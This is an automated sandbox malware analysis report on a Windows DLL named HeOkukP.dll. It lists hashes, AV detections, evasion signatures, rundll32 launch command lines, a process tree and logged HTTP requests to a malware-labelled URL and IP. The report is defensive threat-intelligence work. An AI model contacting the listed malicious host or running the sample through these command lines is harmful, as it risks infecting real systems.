Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HeOkukP.dll

Overview

General Information

Sample name:HeOkukP.dll
Analysis ID:1502264
MD5:57c5d2950f3b91f96c81ae32e1b01a44
SHA1:53645e86895b877cfd5b8284dbcc8c0314337b8c
SHA256:d11a6b623af75e54374bea05172b2193f93e2a8aa479ed13a7b1d19dd3738245
Tags:dll
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7704 cmdline: loaddll32.exe "C:\Users\user\Desktop\HeOkukP.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7784 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7816 cmdline: rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7792 cmdline: rundll32.exe C:\Users\user\Desktop\HeOkukP.dll,#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8024 cmdline: rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: HeOkukP.dllAvira: detected
Source: http://www.rapidfilestorage.com/clrls/cl_rls.jsonBAvira URL Cloud: Label: malware
Source: http://www.rapidfilestorage.com/clrls/cl_rls.jsonLzAvira URL Cloud: Label: malware
Source: http://www.rapidfilestorage.com/clrls/cl_rls.json)Avira URL Cloud: Label: malware
Source: http://www.rapidfilestorage.com/clrls/cl_rls.json;Avira URL Cloud: Label: malware
Source: http://www.rapidfilestorage.com/clrls/cl_rls.jsondAvira URL Cloud: Label: malware
Source: http://www.rapidfilestorage.com/clrls/cl_rls.jsonAvira URL Cloud: Label: malware
Source: http://www.rapidfilestorage.com/clrls/cl_rls.jsonuAvira URL Cloud: Label: malware
Source: env-3936544.jcloud.kzVirustotal: Detection: 5%Perma Link
Source: HeOkukP.dllVirustotal: Detection: 40%Perma Link
Source: HeOkukP.dllReversingLabs: Detection: 31%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Source: HeOkukP.dllJoe Sandbox ML: detected
Source: HeOkukP.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Networking

barindex
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.22.66.16 80Jump to behavior
Source: global trafficHTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox ViewIP Address: 185.22.66.16 185.22.66.16
Source: Joe Sandbox ViewASN Name: PSKZ PSKZ
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: www.rapidfilestorage.com
Source: rundll32.exe, 00000009.00000003.1368971478.000000000339A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rapidfilestorage.com/clrls/cl_rls.json
Source: rundll32.exe, 00000005.00000003.1336028674.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1335749105.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1336998419.0000000002B3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rapidfilestorage.com/clrls/cl_rls.json)
Source: rundll32.exe, 00000009.00000002.1369354017.0000000003340000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1369059378.000000000333A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368849550.0000000003333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rapidfilestorage.com/clrls/cl_rls.json;
Source: rundll32.exe, 00000007.00000003.1336450668.00000000028E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1336974130.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.00000000028E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rapidfilestorage.com/clrls/cl_rls.jsonB
Source: rundll32.exe, 00000009.00000003.1368849550.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.1369354017.000000000339C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368526440.000000000339A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368971478.000000000339A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rapidfilestorage.com/clrls/cl_rls.jsonLz
Source: rundll32.exe, 00000005.00000003.1336500957.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1336963668.0000000002AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rapidfilestorage.com/clrls/cl_rls.jsond
Source: rundll32.exe, 00000005.00000003.1336028674.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1335749105.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1336998419.0000000002B3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rapidfilestorage.com/clrls/cl_rls.jsonu
Source: rundll32.exe, 00000005.00000003.1336028674.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336201784.0000000002B75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336352369.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1337153187.000000000297D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336364192.0000000002971000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1336974130.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336389193.0000000002978000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336450668.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368930066.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368971478.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.1369354017.00000000033B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: rundll32.exe, 00000005.00000003.1336028674.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336201784.0000000002B75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336352369.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1337153187.000000000297D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336364192.0000000002971000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1336974130.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336389193.0000000002978000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336450668.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368930066.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368971478.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.1369354017.00000000033B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: rundll32.exe, 00000005.00000003.1336028674.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336201784.0000000002B75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336352369.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1337153187.000000000297D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336364192.0000000002971000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1336974130.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336389193.0000000002978000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336450668.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368930066.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368971478.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.1369354017.00000000033B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C233B05_2_04C233B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04BD33B07_2_04BD33B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_056533B09_2_056533B0
Source: HeOkukP.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engineClassification label: mal88.evad.winDLL@10/0@1/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\2_PhpuzIakkdPWqpI
Source: HeOkukP.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Program Files\Mozilla Firefox\application.iniJump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HeOkukP.dll,#1
Source: HeOkukP.dllVirustotal: Detection: 40%
Source: HeOkukP.dllReversingLabs: Detection: 31%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\HeOkukP.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HeOkukP.dll,#1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HeOkukP.dll,#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: HeOkukP.dllStatic file information: File size 6726144 > 1048576
Source: HeOkukP.dllStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x5ec800
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C364F0 push eax; ret 5_2_04C3650E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C23395 push ecx; ret 5_2_04C233A8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04BD3395 push ecx; ret 7_2_04BD33A8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04BE64F0 push eax; ret 7_2_04BE650E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_056664F0 push eax; ret 9_2_0566650E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_05653395 push ecx; ret 9_2_056533A8
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-1657
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 4.4 %
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 1.9 %
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.3 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: rundll32.exe, 00000007.00000003.1335961205.0000000002963000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1337105449.0000000002968000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336429087.0000000002967000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
Source: rundll32.exe, 00000005.00000003.1336028674.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1335749105.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336312907.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1337134914.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1335961205.0000000002963000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1336974130.0000000002935000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.0000000002935000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1337105449.0000000002968000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336429087.0000000002967000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.1369354017.0000000003340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000005.00000003.1336352369.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1336998419.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336028674.0000000002AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_5-1658
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_7-1645
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_9-1546
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C2F0EF EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_04C2F0EF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C2F0EF EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_04C2F0EF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C211A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_04C211A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04BD11A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_04BD11A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_056511A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_056511A4

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.22.66.16 80Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HeOkukP.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_04C2E1C6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: __IsNonwritableInCurrentImage,___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,5_2_04C233B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,5_2_04C22C29
Source: C:\Windows\SysWOW64\rundll32.exeCode function: __IsNonwritableInCurrentImage,___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,7_2_04BD33B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_04BDE1C6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,7_2_04BD2C29
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,9_2_05652C29
Source: C:\Windows\SysWOW64\rundll32.exeCode function: __crtGetLocaleInfoA_stat,9_2_0565E1C6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: __IsNonwritableInCurrentImage,___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__calloc_crt,__invoke_watson,9_2_056533B0
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API
1
DLL Side-Loading
111
Process Injection
1
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
111
Process Injection
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Rundll32
NTDS11
System Information Discovery
Distributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502264 Sample: HeOkukP.dll Startdate: 31/08/2024 Architecture: WINDOWS Score: 88 22 env-3936544.jcloud.kz 2->22 24 www.rapidfilestorage.com 2->24 28 Multi AV Scanner detection for domain / URL 2->28 30 Antivirus detection for URL or domain 2->30 32 Antivirus / Scanner detection for submitted sample 2->32 34 3 other signatures 2->34 8 loaddll32.exe 1 2->8         started        signatures3 process4 process5 10 rundll32.exe 12 8->10         started        13 rundll32.exe 12 8->13         started        16 cmd.exe 1 8->16         started        18 conhost.exe 8->18         started        dnsIp6 36 System process connects to network (likely due to code injection or exploit) 10->36 26 env-3936544.jcloud.kz 185.22.66.16, 49709, 49710, 49711 PSKZ Kazakhstan 13->26 20 rundll32.exe 12 16->20         started        signatures7 process8

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
HeOkukP.dll41%VirustotalBrowse
HeOkukP.dll32%ReversingLabs
HeOkukP.dll100%AviraHEUR/AGEN.1300638
HeOkukP.dll100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
env-3936544.jcloud.kz5%VirustotalBrowse
www.rapidfilestorage.com1%VirustotalBrowse
SourceDetectionScannerLabelLink
https://crash-reports.mozilla.com/submit?id=0%URL Reputationsafe
http://www.rapidfilestorage.com/clrls/cl_rls.jsonB100%Avira URL Cloudmalware
http://www.rapidfilestorage.com/clrls/cl_rls.jsonLz100%Avira URL Cloudmalware
http://www.rapidfilestorage.com/clrls/cl_rls.json)100%Avira URL Cloudmalware
http://www.rapidfilestorage.com/clrls/cl_rls.json;100%Avira URL Cloudmalware
https://hg.mozilla.org/releases/mozilla-release0%Avira URL Cloudsafe
http://www.rapidfilestorage.com/clrls/cl_rls.jsond100%Avira URL Cloudmalware
http://www.rapidfilestorage.com/clrls/cl_rls.json100%Avira URL Cloudmalware
http://www.rapidfilestorage.com/clrls/cl_rls.jsonu100%Avira URL Cloudmalware
http://www.rapidfilestorage.com/clrls/cl_rls.jsonB2%VirustotalBrowse
https://hg.mozilla.org/releases/mozilla-release0%VirustotalBrowse
http://www.rapidfilestorage.com/clrls/cl_rls.json;2%VirustotalBrowse
http://www.rapidfilestorage.com/clrls/cl_rls.json2%VirustotalBrowse
http://www.rapidfilestorage.com/clrls/cl_rls.jsonu2%VirustotalBrowse
http://www.rapidfilestorage.com/clrls/cl_rls.jsond2%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
env-3936544.jcloud.kz
185.22.66.16
truetrueunknown
www.rapidfilestorage.com
unknown
unknownfalseunknown
NameMaliciousAntivirus DetectionReputation
http://www.rapidfilestorage.com/clrls/cl_rls.jsontrue
  • 2%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://www.rapidfilestorage.com/clrls/cl_rls.jsonBrundll32.exe, 00000007.00000003.1336450668.00000000028E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1336974130.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.00000000028E2000.00000004.00000020.00020000.00000000.sdmpfalse
  • 2%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
https://hg.mozilla.org/releases/mozilla-releaserundll32.exe, 00000005.00000003.1336028674.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336201784.0000000002B75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336352369.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1337153187.000000000297D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336364192.0000000002971000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1336974130.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336389193.0000000002978000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336450668.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368930066.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368971478.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.1369354017.00000000033B3000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.rapidfilestorage.com/clrls/cl_rls.jsonLzrundll32.exe, 00000009.00000003.1368849550.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.1369354017.000000000339C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368526440.000000000339A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.1368971478.000000000339A000.00000004.00000020.00020000.00000000.sdmpfalse
